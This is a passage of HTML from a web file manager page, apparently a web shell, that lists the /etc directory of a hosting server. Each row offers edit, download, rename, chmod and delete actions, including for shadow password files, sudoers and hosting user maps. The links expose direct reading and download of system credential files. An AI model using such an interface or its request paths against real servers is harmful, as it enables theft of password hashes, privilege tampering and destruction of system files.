                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshadow-" class="file-link">📄 shadow-</a></td>
                            <td class="size">54.8 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-04 17:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshadow-" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fshadow-" class="action-button">Download</a>
                                <button onclick="showRename('/etc/shadow-','shadow-')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/shadow-','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/shadow-',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="shadow.nouids.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshadow.nouids.cache" class="file-link">📄 shadow.nouids.cache</a></td>
                            <td class="size">199.6 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-20 10:35</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshadow.nouids.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fshadow.nouids.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/shadow.nouids.cache','shadow.nouids.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/shadow.nouids.cache','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/shadow.nouids.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="shells">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshells" class="file-link">📄 shells</a></td>
                            <td class="size">174 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshells" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fshells" class="action-button">Download</a>
                                <button onclick="showRename('/etc/shells','shells')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/shells','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/shells',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="skipsmtpcheckhosts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fskipsmtpcheckhosts" class="file-link">📄 skipsmtpcheckhosts</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fskipsmtpcheckhosts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fskipsmtpcheckhosts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/skipsmtpcheckhosts','skipsmtpcheckhosts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/skipsmtpcheckhosts','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/skipsmtpcheckhosts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="spammeripblocks">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fspammeripblocks" class="file-link">📄 spammeripblocks</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fspammeripblocks" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fspammeripblocks" class="action-button">Download</a>
                                <button onclick="showRename('/etc/spammeripblocks','spammeripblocks')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/spammeripblocks','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/spammeripblocks',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="spammers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fspammers" class="file-link">📄 spammers</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-24 13:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fspammers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fspammers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/spammers','spammers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/spammers','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/spammers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="spfdomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fspfdomains" class="file-link">📄 spfdomains</a></td>
                            <td class="size">9 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fspfdomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fspfdomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/spfdomains','spfdomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/spfdomains','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/spfdomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ssldomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fssldomains" class="file-link">📄 ssldomains</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-09-01 07:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fssldomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fssldomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ssldomains','ssldomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ssldomains','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ssldomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="stats.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fstats.conf" class="file-link">📄 stats.conf</a></td>
                            <td class="size">89 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fstats.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fstats.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/stats.conf','stats.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/stats.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/stats.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="subgid">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubgid" class="file-link">📄 subgid</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubgid" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsubgid" class="action-button">Download</a>
                                <button onclick="showRename('/etc/subgid','subgid')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/subgid','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/subgid',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="subgid-">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubgid-" class="file-link">📄 subgid-</a></td>
                            <td class="size">17 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubgid-" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsubgid-" class="action-button">Download</a>
                                <button onclick="showRename('/etc/subgid-','subgid-')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/subgid-','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/subgid-',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="subuid">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubuid" class="file-link">📄 subuid</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubuid" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsubuid" class="action-button">Download</a>
                                <button onclick="showRename('/etc/subuid','subuid')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/subuid','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/subuid',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="subuid-">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubuid-" class="file-link">📄 subuid-</a></td>
                            <td class="size">17 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsubuid-" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsubuid-" class="action-button">Download</a>
                                <button onclick="showRename('/etc/subuid-','subuid-')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/subuid-','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/subuid-',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sudo-ldap.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsudo-ldap.conf" class="file-link">📄 sudo-ldap.conf</a></td>
                            <td class="size">3.1 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-05-20 20:03</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsudo-ldap.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsudo-ldap.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sudo-ldap.conf','sudo-ldap.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sudo-ldap.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sudo-ldap.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sudo.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsudo.conf" class="file-link">📄 sudo.conf</a></td>
                            <td class="size">4.3 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-05-21 01:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsudo.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsudo.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sudo.conf','sudo.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sudo.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sudo.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sudoers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsudoers" class="file-link">📄 sudoers</a></td>
                            <td class="size">4.2 KB</td>
                            <td><span class="permissions">0440</span></td>
                            <td>2025-02-25 15:28</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsudoers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsudoers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sudoers','sudoers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sudoers','0440')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sudoers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sys-snap.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsys-snap.conf" class="file-link">📄 sys-snap.conf</a></td>
                            <td class="size">66 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsys-snap.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsys-snap.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sys-snap.conf','sys-snap.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sys-snap.conf','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sys-snap.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sys-snap.conf.rpmnew">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsys-snap.conf.rpmnew" class="file-link">📄 sys-snap.conf.rpmnew</a></td>
                            <td class="size">63 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-05-30 18:38</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsys-snap.conf.rpmnew" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsys-snap.conf.rpmnew" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sys-snap.conf.rpmnew','sys-snap.conf.rpmnew')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sys-snap.conf.rpmnew','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sys-snap.conf.rpmnew',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sysctl.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsysctl.conf" class="file-link">📄 sysctl.conf</a></td>
                            <td class="size">1.9 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-06-03 23:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsysctl.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsysctl.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sysctl.conf','sysctl.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sysctl.conf','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sysctl.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="system-release">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsystem-release" class="file-link">📄 system-release</a></td>
                            <td class="size">37 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsystem-release" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsystem-release" class="action-button">Download</a>
                                <button onclick="showRename('/etc/system-release','system-release')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/system-release','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/system-release',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="system-release-cpe">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsystem-release-cpe" class="file-link">📄 system-release-cpe</a></td>
                            <td class="size">37 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsystem-release-cpe" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsystem-release-cpe" class="action-button">Download</a>
                                <button onclick="showRename('/etc/system-release-cpe','system-release-cpe')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/system-release-cpe','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/system-release-cpe',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="trueuserdomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrueuserdomains" class="file-link">📄 trueuserdomains</a></td>
                            <td class="size">35.4 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrueuserdomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ftrueuserdomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/trueuserdomains','trueuserdomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/trueuserdomains','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/trueuserdomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="trueuserowners">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrueuserowners" class="file-link">📄 trueuserowners</a></td>
                            <td class="size">12.6 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrueuserowners" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ftrueuserowners" class="action-button">Download</a>
                                <button onclick="showRename('/etc/trueuserowners','trueuserowners')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/trueuserowners','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/trueuserowners',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="trusted-key.key">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrusted-key.key" class="file-link">📄 trusted-key.key</a></td>
                            <td class="size">375 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-13 11:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrusted-key.key" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ftrusted-key.key" class="action-button">Download</a>
                                <button onclick="showRename('/etc/trusted-key.key','trusted-key.key')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/trusted-key.key','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/trusted-key.key',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="trusted_mail_users">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrusted_mail_users" class="file-link">📄 trusted_mail_users</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrusted_mail_users" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ftrusted_mail_users" class="action-button">Download</a>
                                <button onclick="showRename('/etc/trusted_mail_users','trusted_mail_users')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/trusted_mail_users','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/trusted_mail_users',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="trustedmailhosts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrustedmailhosts" class="file-link">📄 trustedmailhosts</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ftrustedmailhosts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ftrustedmailhosts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/trustedmailhosts','trustedmailhosts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/trustedmailhosts','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/trustedmailhosts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="updatedb.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fupdatedb.conf" class="file-link">📄 updatedb.conf</a></td>
                            <td class="size">447 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fupdatedb.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fupdatedb.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/updatedb.conf','updatedb.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/updatedb.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/updatedb.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="userbwlimits">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserbwlimits" class="file-link">📄 userbwlimits</a></td>
                            <td class="size">10.4 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserbwlimits" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fuserbwlimits" class="action-button">Download</a>
                                <button onclick="showRename('/etc/userbwlimits','userbwlimits')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/userbwlimits','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/userbwlimits',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="userdatadomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserdatadomains" class="file-link">📄 userdatadomains</a></td>
                            <td class="size">395.5 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserdatadomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fuserdatadomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/userdatadomains','userdatadomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/userdatadomains','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/userdatadomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="userdatadomains.json">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserdatadomains.json" class="file-link">📄 userdatadomains.json</a></td>
                            <td class="size">425.4 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserdatadomains.json" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fuserdatadomains.json" class="action-button">Download</a>
                                <button onclick="showRename('/etc/userdatadomains.json','userdatadomains.json')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/userdatadomains.json','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/userdatadomains.json',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="userdomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserdomains" class="file-link">📄 userdomains</a></td>
                            <td class="size">104.7 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserdomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fuserdomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/userdomains','userdomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/userdomains','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/userdomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="userips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserips" class="file-link">📄 userips</a></td>
                            <td class="size">18.4 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fuserips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/userips','userips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/userips','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/userips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="userplans">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserplans" class="file-link">📄 userplans</a></td>
                            <td class="size">13.7 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fuserplans" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fuserplans" class="action-button">Download</a>
                                <button onclick="showRename('/etc/userplans','userplans')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/userplans','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/userplans',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="vconsole.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fvconsole.conf" class="file-link">📄 vconsole.conf</a></td>
                            <td class="size">28 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-18 19:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fvconsole.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fvconsole.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/vconsole.conf','vconsole.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/vconsole.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/vconsole.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="vimrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fvimrc" class="file-link">📄 vimrc</a></td>
                            <td class="size">3.9 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-29 22:08</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fvimrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fvimrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/vimrc','vimrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/vimrc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/vimrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="virc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fvirc" class="file-link">📄 virc</a></td>
                            <td class="size">1.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-29 22:08</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fvirc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fvirc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/virc','virc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/virc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/virc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="webspam">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwebspam" class="file-link">📄 webspam</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwebspam" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fwebspam" class="action-button">Download</a>
                                <button onclick="showRename('/etc/webspam','webspam')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/webspam','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/webspam',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wgetrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwgetrc" class="file-link">📄 wgetrc</a></td>
                            <td class="size">4.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-09-03 11:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwgetrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fwgetrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/wgetrc','wgetrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/wgetrc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/wgetrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wwwacct.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf" class="file-link">📄 wwwacct.conf</a></td>
                            <td class="size">263 B</td>
                            <td><span class="permissions">0644</span></td>
